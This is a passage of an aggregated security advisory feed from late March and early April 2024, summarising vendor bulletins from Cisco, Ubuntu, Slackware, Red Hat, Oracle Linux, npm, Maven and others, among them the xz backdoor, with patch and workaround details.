27.03.2024 18:00:00cisco[CISCO-SA-AUX-333WBZ8F] Cisco IOS XE Software Auxiliary Asynchronous Port Denial of Service Vulnerability (medium)A vulnerability in auxiliary asynchronous port (AUX) functions of Cisco IOS XE Software could allow an authenticated, local attacker to cause an affected device to reload or stop responding.This vulnerability is due to the incorrect handling of specific ingress traffic when flow control hardware is enabled on the AUX port. An attacker could exploit this vulnerability by reverse telnetting to the AUX port and sending specific data after connecting. A successful exploit could allow the attacker to cause the device to reset or stop responding, resulting in a denial of service (DoS) condition.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AUX-333WBZ8F
27.03.2024 18:00:00cisco[CISCO-SA-AP-SECUREBOOT-BYPASS-ZT5VJKSD] Cisco Access Point Software Secure Boot Bypass Vulnerability (high)A vulnerability in the boot process of Cisco Access Point (AP) Software could allow an unauthenticated, physical attacker to bypass the Cisco Secure Boot functionality and load a software image that has been tampered with on an affected device.This vulnerability exists because unnecessary commands are available during boot time at the physical console. An attacker could exploit this vulnerability by interrupting the boot process and executing specific commands to bypass the Cisco Secure Boot validation checks and load an image that has been tampered with. This image would have been previously downloaded onto the targeted device. A successful exploit could allow the attacker to load the image once. The Cisco Secure Boot functionality is not permanently compromised.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AP-SECUREBOOT-BYPASS-ZT5VJKSD
27.03.2024 18:00:00cisco[CISCO-SA-AP-DOS-H9TGGX6W] Cisco Access Point Software Denial of Service Vulnerability (high)A vulnerability in the IP packet processing of Cisco Access Point (AP) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient input validation of certain IPv4 packets. An attacker could exploit this vulnerability by sending a crafted IPv4 packet either to or through an affected device. A successful exploit could allow the attacker to cause an affected device to reload unexpectedly, resulting in a DoS condition. To successfully exploit this vulnerability, the attacker does not need to be associated with the affected AP. This vulnerability cannot be exploited by sending IPv6 packets.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AP-DOS-H9TGGX6W
27.03.2024 18:00:00cisco[CISCO-SA-AIRO-AP-DOS-PPPTCVW] Cisco Aironet Access Point Software Resource Exhaustion Denial of Service Vulnerability (medium)A vulnerability in the handling of encrypted wireless frames of Cisco Aironet Access Point (AP) Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on the affected device.This vulnerability is due to incomplete cleanup of resources when dropping certain malformed frames. An attacker could exploit this vulnerability by connecting as a wireless client to an affected AP and sending specific malformed frames over the wireless connection. A successful exploit could allow the attacker to cause degradation of service to other clients, which could potentially lead to a complete DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AIRO-AP-DOS-PPPTCVW
27.03.2024 17:23:13ubuntu[USN-6719-1] util-linux vulnerabilityutil-linux could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6719-1
27.03.2024 16:59:43ubuntu[USN-6718-2] curl vulnerabilitycurl could be made to cause a denial of service.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6718-2
27.03.2024 13:43:38ubuntu[USN-6718-1] curl vulnerabilitiesSeveral security issues were fixed in curl.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6718-1
27.03.2024 23:58:42maven[MAVEN:GHSA-5667-3WCH-7Q7W] Eclipse Vert.x memory leak (moderate)A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, the leak is triggered when the Vert.x HTTP client establishes connections to different hosts. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5667-3WCH-7Q7W
27.03.2024 09:00:00msrc[MS:CVE-2024-2883] Chromium: CVE-2024-2883 Use after free in ANGLEhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2883
27.03.2024 09:00:00msrc[MS:CVE-2024-2885] Chromium: CVE-2024-2885 Use after free in Dawnhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2885
27.03.2024 09:00:00msrc[MS:CVE-2024-2886] Chromium: CVE-2024-2886 Use after free in WebCodecshttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2886
27.03.2024 09:00:00msrc[MS:CVE-2024-2887] Chromium: CVE-2024-2887 Type Confusion in WebAssemblyhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2887
27.03.2024 23:59:27maven[MAVEN:GHSA-6PWG-GG6J-5CRM] Ignite Realtime Openfire privilege escalation vulnerability (high)An issue in Ignite Realtime Openfire v.4.8.0 and before allows a remote attacker to escalate privileges via the ROOM_CACHE component.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6PWG-GG6J-5CRM
27.03.2024 23:59:22maven[MAVEN:GHSA-5XVC-RWV8-86P7] Ignite Realtime Openfire privilege escalation vulnerability (high)An issue in Ignite Realtime Openfire v.4.8.0 and before allows a remote attacker to escalate privileges via the admin.authorizedJIDs system property component.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5XVC-RWV8-86P7
29.03.2024 04:31:04slackware[SSA:2024-088-03] coreutils (medium)New coreutils packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/coreutils-9.5-i586-1_slack15.0.txz: Upgraded. chmod -R now avoids a race where an attacker may replace a traversed file with a symlink, causing chmod to operate on an unintended file. [This bug was present in "the beginning".] split --line-bytes with a mixture of very long and short lines no longer overwrites the heap. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-0684 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/coreutils-9.5-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/coreutils-9.5-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/coreutils-9.5-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/coreutils-9.5-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 3d9096c0d9adf3f53a643cc10f8f030f coreutils-9.5-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 655547308015cd3f555f44791727acd4 coreutils-9.5-x86_64-1_slack15.0.txz Slackware -current package: 4ebc7ecd4ebd0d6e9c6d0b1072f5e61a a/coreutils-9.5-i586-1.txz Slackware x86_64 -current package: 8f9f0cda9c123f022063eedd2461290f a/coreutils-9.5-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg coreutils-9.5-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-088-03
28.03.2024 23:56:23slackware[SSA:2024-088-02] util-linuxNew util-linux packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/util-linux-2.37.4-i586-3_slack15.0.txz: Rebuilt. This release fixes a vulnerability where the wall command did not filter escape sequences from command line arguments, allowing unprivileged users to put arbitrary text on other users' terminals. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-28085 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/util-linux-2.37.4-i586-3_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/util-linux-2.37.4-x86_64-3_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/util-linux-2.40-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/util-linux-2.40-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 3cd4404f3936f17e7f0ab70a4db3c3c5 util-linux-2.37.4-i586-3_slack15.0.txz Slackware x86_64 15.0 package: bb90b0b99780f22a4bce3829235169c5 util-linux-2.37.4-x86_64-3_slack15.0.txz Slackware -current package: 46535176e55cabab56994a2031acd643 a/util-linux-2.40-i586-1.txz Slackware x86_64 -current package: a16777d05bd73065cad733ee2a24f660 a/util-linux-2.40-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg util-linux-2.37.4-i586-3_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-088-02
28.03.2024 23:55:57slackware[SSA:2024-088-01] seamonkeyNew seamonkey packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/seamonkey-2.53.18.2-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.seamonkey-project.org/releases/seamonkey2.53.18.2 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/seamonkey-2.53.18.2-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/seamonkey-2.53.18.2-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.53.18.2-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.53.18.2-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 2dbdccdb494729f90d6d0954b561878c seamonkey-2.53.18.2-i686-1_slack15.0.txz Slackware x86_64 15.0 package: 25be813d3882c6b54cee637768abd8b7 seamonkey-2.53.18.2-x86_64-1_slack15.0.txz Slackware -current package: 2d38cdda257357ada4c630651f3d9aa3 xap/seamonkey-2.53.18.2-i686-1.txz Slackware x86_64 -current package: 8cfff0e1b9750a00689cb6e5e8100a18 xap/seamonkey-2.53.18.2-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg seamonkey-2.53.18.2-i686-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-088-01
28.03.2024 22:44:52ubuntu[USN-6707-4] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-4
28.03.2024 22:40:23ubuntu[USN-6704-4] Linux kernel (Intel IoTG) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-4
29.03.2024 22:16:23npm[NPM:GHSA-34H3-8MW4-QW57] @electron/packager's build process memory potentially leaked into final executable (high)### Impact A random segment of ~1-10kb of Node.js heap memory allocated either side of a known buffer will be leaked into the final executable. This memory _could_ contain sensitive information such as environment variables, secrets files, etc. ### Patches This issue is patched in 18.3.1 ### Workarounds No workarounds, please update to a patched version of `@electron/packager` immediately if impacted.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-34H3-8MW4-QW57
29.03.2024 22:16:02npm[NPM:GHSA-35W3-6QHC-474V] @workos-inc/authkit-nextjs session replay vulnerability (moderate)### Impact A user can reuse an expired session by controlling the `x-workos-session` header. ### Patches Patched in https://github.com/workos/authkit-nextjs/releases/tag/v0.4.2https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-35W3-6QHC-474V
29.03.2024 21:04:00npm[NPM:GHSA-W387-5QQW-7G8M] Content-Security-Policy header generation in middleware could be compromised by malicious injections (high)### Impact When the following conditions are met: - Automated CSP headers generation for SSR content is enabled - The web application serves content that can be partially controlled by external users Then it is possible that the CSP headers generation feature might be "allow-listing" malicious injected resources like inlined JS, or references to external malicious scripts. ### Patches Available in version 1.3.0. ### Workarounds - Do not enable CSP headers generation. - Use it only for dynamically generated content that cannot be controlled by external users in any way.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W387-5QQW-7G8M
29.03.2024 19:15:21alpinelinux[ALPINE:CVE-2024-3094] xz vulnerability (critical)[From CVE-2024-3094] Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-3094
29.03.2024 17:58:07maven[MAVEN:GHSA-PW39-F3M5-CXFC] Elasticsearch Uncaught Exception leading to crash (moderate)An uncaught exception in Elasticsearch >= 8.4.0 and < 8.11.1 occurs when an encrypted PDF is passed to an attachment processor through the REST API. The Elasticsearch ingest node that attempts to parse the PDF file will crash. This does not happen with password-protected PDF files or with unencrypted PDF files.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PW39-F3M5-CXFC
31.03.2024 02:00:00debian[DSA-5650-1] util-linux security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5650-1
31.03.2024 02:00:00debian[DSA-5651-1] mediawiki security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5651-1
31.03.2024 17:44:37rustsec[RUSTSEC-2024-0331] Puccinier is unmaintained.The tool has been deprecated in favor of Catppuccin's new tool, [whiskers](https://github.com/catppuccin/toolbox/tree/main/whiskers) [(crates.io)](https://crates.io/crates/catppuccin-whiskers).https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0331
30.03.2024 21:01:00opensuse[openSUSE-SU-2024:0095-1] Security update for kanidm (moderate)Security update for kanidmhttps://secdb.nttzen.cloud/security-advisory/opensuse/openSUSE-SU-2024:0095-1
01.04.2024 23:33:53npm[NPM:GHSA-C4GR-Q97G-PPWC] In Astro-Shield, setting a correct `integrity` attribute to injected code allows to bypass the allow-lists (high)### Impact Versions from 1.2.0 to 1.3.1 of Astro-Shield allow the allow-lists for cross-origin resources to be bypassed by introducing valid `integrity` attributes to the injected code. This implies that the injected SRI hash would be added to the generated CSP header, which would lead the browser to believe that the injected resource is legitimate. To exploit this vulnerability, the attacker needs to first inject code into the rendered pages by exploiting other, unrelated vulnerabilities. ### Patches Version [1.3.2](https://github.com/kindspells/astro-shield/releases/tag/1.3.2) provides a patch. ### Workarounds - Do not use the middleware functionality of Astro-Shield. - Use the middleware functionality of Astro-Shield ONLY for content that cannot be controlled in any way by external users.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C4GR-Q97G-PPWC
02.04.2024 02:02:56maven[MAVEN:GHSA-R65J-6H5F-4F92] JJWT improperly generates signing keys (moderate)JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R65J-6H5F-4F92
01.04.2024 18:52:51maven[MAVEN:GHSA-8VJ9-5V5Q-FHCH] Bonita cross-site scripting vulnerability (moderate)Bonita before 10.1.0.W11 allows stored XSS via a UI screen in the administration panel.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8VJ9-5V5Q-FHCH
01.04.2024 03:00:00redhat[RHSA-2024:1576] ruby:3.1 security, bug fix, and enhancement update (moderate)Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-29052) Security Fix(es): * ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621) * ruby: ReDoS vulnerability in URI (CVE-2023-28755) * ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617) * ruby: ReDoS vulnerability in Time (CVE-2023-28756) Bug Fix(es): * ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-29048) * ruby: Ruby cannot read private key in FIPS mode on RHEL 9 (RHEL-12437) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1576
01.04.2024 10:00:00msrc[MS:CVE-2024-2883] Chromium: CVE-2024-2883 Use after free in ANGLEhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2883
02.04.2024 20:01:26go[GO-2024-2668] Login username enumeration in github.com/IceWhaleTech/CasaOS-UserService (medium)The Casa OS Login page has a username enumeration vulnerability in the login page that was patched in Casa OS v0.4.7. The issue exists because the application response differs depending on whether the username or password is incorrect, allowing an attacker to enumerate usernames by observing the application response. For example, if the username is incorrect, the application returns "User does not exist" with return code "10006", while if the password is incorrect, it returns "User does not exist or password is invalid" with return code "10013". This allows an attacker to determine if a username exists without knowing the password.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2668
02.04.2024 14:41:26ubuntu[USN-6720-1] Cacti vulnerability (critical)Cacti could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6720-1
02.04.2024 19:15:48maven[MAVEN:GHSA-9PH3-V2VH-3QX7] Eclipse Vert.x vulnerable to a memory leak in TCP servers (moderate)A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9PH3-V2VH-3QX7
02.04.2024 12:11:24composer[PHP:CAUSAL-OIDC-2024-30173] TYPO3-EXT-SA-2024-002: Authentication Bypass in "OpenID Connect Authentication" (oidc)https://secdb.nttzen.cloud/security-advisory/composer/PHP:CAUSAL-OIDC-2024-30173
02.04.2024 03:00:00debian[DSA-5652-1] py7zr (critical) security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5652-1
02.04.2024 03:00:00oraclelinux[ELSA-2024-12257] Unbreakable Enterprise kernel security update (important)[4.14.35-2047.534.3.1]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters (Florian Westphal) [Orabug: 36251145] {CVE-2024-1086}https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12257
02.04.2024 03:00:00oraclelinux[ELSA-2024-12259] Unbreakable Enterprise kernel-container security update (important)[5.4.17-2136.329.3.2.el7]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters (Florian Westphal) [Orabug: 36465920] {CVE-2024-1086}https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12259
02.04.2024 03:00:00oraclelinux[ELSA-2024-12260] Unbreakable Enterprise kernel-container security update (important)[5.4.17-2136.329.3.2.el8]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters (Florian Westphal) [Orabug: 36465920] {CVE-2024-1086}https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12260
02.04.2024 03:00:00redhat[RHSA-2024:1610] less security update (moderate)The "less" utility is a text file browser that resembles "more", but allows users to move backwards in the file as well as forwards. Since "less" does not read the entire input file at startup, it also starts more quickly than ordinary text editors. Security Fix(es): * less: missing quoting of shell metacharacters in LESSCLOSE handling (CVE-2022-48624) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1610
02.04.2024 03:00:00redhat[RHSA-2024:1612] kpatch-patch security update (important)This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Security Fix(es): * kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1612
02.04.2024 03:00:00redhat[RHSA-2024:1615] expat security update (moderate)Expat is a C library for parsing XML documents. Security Fix(es): * expat: parsing large tokens can trigger a denial of service (CVE-2023-52425) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1615
02.04.2024 03:00:00redhat[RHSA-2024:1644] grafana-pcp security and bug fix update (important)The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards. Security Fix(es): * golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) Bug Fix(es): * TRIAGE CVE-2024-1394 grafana-pcp: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (JIRA:RHEL-30544)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1644
02.04.2024 03:00:00redhat[RHSA-2024:1646] grafana security and bug fix update (important)Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es): * golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) Bug Fix(es): * TRIAGE CVE-2024-1394 grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (JIRA:RHEL-30543)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1646
02.04.2024 03:00:00oraclelinux[ELSA-2024-12261] olcne security update (important)[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provisionhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12261
02.04.2024 03:00:00oraclelinux[ELSA-2024-12262] olcne security update (important)[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provisionhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12262
02.04.2024 03:00:00oraclelinux[ELSA-2024-12263] olcne security update (important)[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provisionhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12263
02.04.2024 03:00:00oraclelinux[ELSA-2024-12264] olcne security update (important)[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provisionhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12264
02.04.2024 03:00:00oraclelinux[ELSA-2024-1576] ruby:3.1 security, bug fix, and enhancement update (moderate)ruby[3.1.4-143]- Upgrade to Ruby 3.1.4. Resolves: RHEL-5586- Fix HTTP response splitting in CGI. Resolves: RHEL-5591- Fix ReDos vulnerability in URI. Resolves: RHEL-28919 Resolves: RHEL-5612- Fix ReDos vulnerability in Time. Resolves: RHEL-28920- Make RDoc soft dependency in IRB. Resolves: RHEL-5613[3.1.2-142]- Bypass git submodule test failure on Git >= 2.38.1.- Fix tests with Europe/Amsterdam pre-1970 time on tzdata version 2022b.- Fix for tzdata-2022g.- Fix OpenSSL.fips_mode and OpenSSL::PKey.read in OpenSSL 3 FIPS. Resolves: RHEL-5590- ssl: use ffdhe2048 from RFC 7919 as the default DH group parameters Related: RHEL-5590- Disable fiddle tests that use FFI closures. Related: RHEL-5590rubygem-mysql2[0.5.4-1]- New upstream release 0.5.4 by merging Fedora rawhide branch (commit: e21b5b9) Resolves: rhbz#2063773[0.5.3-1]- New upstream release 0.5.3 by merging Fedora master branch (commit: 674d475) Resolves: rhbz#1817135rubygem-pg[1.3.5-1]- Update to pg 1.3.5 Related: rhbz#2063773[1.2.3-1]- Update to pg 1.2.3 by merging Fedora master branch (commit: 5db4d26) Resolves: rhbz#1817135https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1576
02.04.2024 03:00:00redhat[RHSA-2024:1601] curl security and bug fix update (moderate)The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.Security Fix(es):* curl: information disclosure by exploiting a mixed case flaw (CVE-2023-46218)* curl: more POST-after-PUT confusion (CVE-2023-28322)* curl: cookie injection with none file (CVE-2023-38546)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* libssh (curl sftp) not trying password auth (BZ#2240033)* libssh: cap SFTP packet size sent (RHEL-5485)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1601
02.04.2024 03:00:00redhat[RHSA-2024:1607] kernel security, bug fix, and enhancement update (important)The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)Bug Fix(es):* OCP 4.12 crashed due to use-after-free in libceph in rhel8 (JIRA:RHEL-21394)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24010)* Screen floods with random colour suggesting something not initialised (JIRA:RHEL-21055)* kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22766)* tx-checksumming required for accessing port in OpenShift for RHEL 8.6 (JIRA:RHEL-20822)* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22077)* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22930)* rbd: don't move requests to the running list on errors [8.x] (JIRA:RHEL-24204)* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24479)* ceph: several cap and snap fixes (JIRA:RHEL-20909)* [RHVH] Migration hangs between RHVH release bellow 4.5.1 
